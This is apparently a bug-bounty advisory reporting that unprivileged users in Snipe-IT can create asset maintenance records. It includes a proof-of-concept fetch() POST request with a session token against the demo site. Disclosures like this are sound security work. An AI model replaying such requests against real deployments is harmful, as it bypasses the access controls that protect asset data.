Improper Privilege Management in snipe/snipe-it

2022-02-1015:54:06

ranjit-git

www.huntr.dev

0.001 Low

EPSS

Percentile

41.2%

JSON

Description

Unprivilege user can create maintainance for asset

Proof of Concept

1. Create regular user and set DENY to all permissions in asset models.
2. Login as the user and sent bellow request to create maintainance for asset

await fetch("https://demo.snipeitapp.com/hardware/maintenances", {
    "credentials": "include",
    "headers": {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Content-Type": "application/x-www-form-urlencoded",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1"
    },
    "referrer": "https://demo.snipeitapp.com/hardware/maintenances/create?asset_id=310",
    "body": "_token=Pvc8rsrc7DcKDjEtD6wtmstrGJfc74utYKkVfAh7&asset_id=310&supplier_id=8&asset_maintenance_type=Maintenance&title=mainrain11&start_date=2022-02-03&completion_date=&cost=&notes=by_admin",
    "method": "POST",
    "mode": "cors"
});

Impact

unprivileged user can create maintainance for any asset

0.001 Low

EPSS

Percentile

41.2%

JSON

Related for 7B7447FC-F1B0-446C-B016-EE3F6511010B